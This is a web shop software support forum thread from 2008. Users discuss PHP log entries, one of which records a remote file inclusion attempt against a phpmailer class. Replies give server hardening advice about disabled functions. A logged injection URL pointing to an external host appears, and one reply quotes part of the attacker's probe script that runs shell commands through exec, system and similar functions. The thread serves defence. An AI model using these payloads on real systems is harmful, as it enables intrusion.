Jump to content

  • You cannot start a new topic
  • You cannot reply to this topic

PHP Warning Rate Topic   - - - - -

 
  • nedd
  • Senior Member
  • Members
  • Join Date: 13-Jan 08
  • 125 posts

Posted 01 April 2008 - 10:10 PM #1

Hi,

just found this in my shop's PHP events log:

-----------------------------------------------------

[01-Apr-2008 10:17:56] PHP Warning: parse_url(//classes/phpmailer/class.cs_phpmailer.php?classes_dir=http://lvps87-230-0-204.dedicated.hosteurope.de/brk/images/banners/test.txt??) [<a href='function.parse-url'>function.parse-url</a>]: Unable to parse URL in /home/.../public_html/addons/seo/init.php on line 37
[01-Apr-2008 10:17:56] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/.../public_html/addons/seo/init.php:37) in /home/.../public_html/core/fn_common.php on line 1993
[01-Apr-2008 10:17:56] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/.../public_html/addons/seo/init.php:37) in /home/.../public_html/core/fn_common.php on line 1993
[01-Apr-2008 10:18:15] PHP Warning: parse_url(//classes/phpmailer/class.cs_phpmailer.php?classes_dir=http://lvps87-230-0-204.dedicated.hosteurope.de/brk/images/banners/test.txt??) [<a href='function.parse-url'>function.parse-url</a>]: Unable to parse URL in /home/.../public_html/addons/seo/init.php on line 37
[01-Apr-2008 10:18:15] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/.../public_html/addons/seo/init.php:37) in /home/.../public_html/core/fn_common.php on line 1993
[01-Apr-2008 10:18:15] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/.../public_html/addons/seo/init.php:37) in /home/.../public_html/core/fn_common.php on line 1993

-----------------------------------------------------

Is this hacking attempt or what?! Any advice is appreciated.

 
  • S-Combs
  • Senior Member
  • Members
  • Join Date: 09-Nov 06
  • 692 posts

Posted 01 April 2008 - 10:57 PM #2

Yes it is a hacking attempt of sorts.

Your site was scanned and an attempt to run that remote file was made but it failed on at least these attempts. This was a known vunerability back in versions 1.3.2 and 1.3.3 and supposedly patched. I still see many of these attempts on phpmailer even on the newer cs-cart installs.

That included file basically searches for vunerable functions on the server and if found, it will be followed by a php shell script someone could use to do real damage to your site or even others on the server depending on the security in place.
Secure Cart Hosting
[CS-Cart Optimized Solutions and Server Management]

 
  • nedd
  • Senior Member
  • Members
  • Join Date: 13-Jan 08
  • 125 posts

Posted 01 April 2008 - 11:14 PM #3

Thanks for the explanation S-Combs!

So if this happens again, should I need to ignore it, or is there anything which I need to do in preventing these kind of hacking attempts?

 
  • S-Combs
  • Senior Member
  • Members
  • Join Date: 09-Nov 06
  • 692 posts

Posted 01 April 2008 - 11:46 PM #4

You should never ignore these because, if a shell is ever executed on your account successfully then you have serious troubles.

I recommend running a phpinfo script just to see if your host is disabling any dangerous functions to start with. If they are not then you should find another home even if they are running other security measures like mod_security.

Look down the phpinfo script until you find disable_functions

Beside that there should be at least a few functions listed that may include some of these below:

shell_exec,exec,system,passthru,popen,proc_open,pass_thru,pcntl_exec,proc_close,proc_get_status,proc_nice,proc_terminate, escapeshellarg,show_source,ini_alter

If there is nothing listed then there is nothing protecting you if a shell script was able to get thru the servers primary security onto your account as they already tried above. They might have security to prevent this shell from accessing other accounts on the server but, nothing will stop that hacker from accessing or destroying your own files and database if they desire.

Some important functions to disable are:
shell_exec,exec,system,passthru,popen

If these are disabled then the phpshell cannot run properly or at all on the server.

This particular script tried on you was looking for these same functions to see if a shell will work.
if (function_exists('exec'))
{
@exec($cfe, $res);
$res = join("\n", $res);
}
elseif (function_exists('shell_exec'))
{
$res = @shell_exec($cfe);
}
elseif (function_exists('system'))
{
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif (function_exists('passthru'))
{
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif (@is_resource($f = @popen($cfe, "r")))

Secure Cart Hosting
[CS-Cart Optimized Solutions and Server Management]

 
  • S-Combs
  • Senior Member
  • Members
  • Join Date: 09-Nov 06
  • 692 posts

Posted 01 April 2008 - 11:59 PM #5

I forgot to finish, hehe


The best thing that you can do on your end to prevent these attempts from working is keep your scripts upgraded and properly secured.. It is also a great idea to remove any files or directories not needed (even inside the scripts). That makes it easier to notice additional files that should not be there. If someone was to get a shell to work, the first thing they will do is make a few copies of it scattered amongst the other files. These will usually be in writable/executable directories but not always.
Secure Cart Hosting
[CS-Cart Optimized Solutions and Server Management]

 
  • BarryH
  • Senior Member
  • Members
  • Join Date: 03-Sep 07
  • 1459 posts

Posted 02 April 2008 - 03:28 PM #6

Oh this got me worried now. I have entries. How would I know what is legitimate and what is hack attempt and further if any have been successful?

BarryH

BarryH

 

CS-Cart v4.4.3 (Plus one being developed v4.5.2 SP2)
UK User


 
  • BarryH
  • Senior Member
  • Members
  • Join Date: 03-Sep 07
  • 1459 posts

Posted 02 April 2008 - 06:18 PM #7

This is an example from log (only ones today).

[02-Apr-2008 12:07:20] PHP Fatal error:  Allowed memory size of 25165824 bytes exhausted (tried to allocate 204801 bytes) in /****/********/public_html/var/compiled/admin/%%E4^E42^E4252AD1%%mainbox.tpl.php on line 38
[02-Apr-2008 12:54:09] PHP Warning:  Cannot modify header information - headers already sent by (output started at /****/********/public_html/include/admin/template_editor.php:61) in Unknown on line 0

Is this a hack? Was it a failure or successful?

:confused: :confused: :confused:
BarryH

BarryH

 

CS-Cart v4.4.3 (Plus one being developed v4.5.2 SP2)
UK User


 
  • MikeFold
  • Senior Member
  • Members
  • Join Date: 24-Nov 06
  • 1034 posts

Posted 02 April 2008 - 06:30 PM #8

i am no expert, but that does not look like a hack attempt
[SIZE="1"]Seamlessly Upgraded to 1.3.5sp4 from 1.3.4sp3
Live: Playboy Collectors Gallery
(Adult)[/SIZE]

[SIZE="2"]LOOKING FOR A FEW COPIES OF THE NEW LITHUANIA PLAYBOY ISSUES...AND COLOMBIA ISSUES.....
FEEL FREE TO Private Message Me....THANKS[/SIZE]


[SIZE="1"]Slightly Modded Default Red | Zardos Lightbox | Sitemap | Multicards Payment Mod |
Cart & Checkout Pages Modified |
[/SIZE]

 
  • BarryH
  • Senior Member
  • Members
  • Join Date: 03-Sep 07
  • 1459 posts

Posted 02 April 2008 - 06:41 PM #9

Thanks Mike

I was hacked on siteground and didn't know what hit me!

I am paranoid now, but don't have 1% of the knowledge required.

BarryH

BarryH

 

CS-Cart v4.4.3 (Plus one being developed v4.5.2 SP2)
UK User


 
  • S-Combs
  • Senior Member
  • Members
  • Join Date: 09-Nov 06
  • 692 posts

Posted 03 April 2008 - 12:08 AM #10

no, those are not hacking attempts but, there is a problem if your store is consuming more than 24mb often. Keep an eye on these logs and if you see this often then you should try to sort out that issue causing it.
Secure Cart Hosting
[CS-Cart Optimized Solutions and Server Management]

 

Posted 03 April 2008 - 12:45 AM #11

no, those are not hacking attempts but, there is a problem if your store is consuming more than 24mb often. Keep an eye on these logs and if you see this often then you should try to sort out that issue causing it.


As Scott just mentioned it's because something's using resources a bit too heavily.
When I first installed a mod that I created to hide prices from users without an account ever page load showed that error. Only realised soon after it was because I have left a large amount of mismatching tags (If) etc which still closed allowing the smarty debugger to continue.... only after it ate half the servers ram loading the page.
I've moved on from CS-Cart to WooC******** - If you need anything I can be of little help.

 
  • nedd
  • Senior Member
  • Members
  • Join Date: 13-Jan 08
  • 125 posts

Posted 03 April 2008 - 01:17 AM #12

This is what I get from my host, regarding my hacking attempt issue and S-Combs security recommendations:

"We adhere to strict security policies, and our servers are audited and policies reevaluated on a regular basis. To be honest, if you are to run a website you should get very use to seeing hacking attempts. A typical server will see hundreds if not thousands of exploit attempts on top of password guessing attempts on various services on any given week.

The practices mentioned in your e-mail are all things to mitigate attacks if an attack is successful. They are not ways to prevent it from happening to begin with. While we do take such steps, the only way to prevent it from happening to begin with is vigilance. Subscribe to mailing lists for all of the software you are using especially release and security related lists. Keep things updated at all times.

Most people are surprised when they learn that there is a steady and constant stream of noise related to automatic scanners and hacking attempts. Most panic, and there's simply not much we can do other than tell them it's normal and to try to get use to it."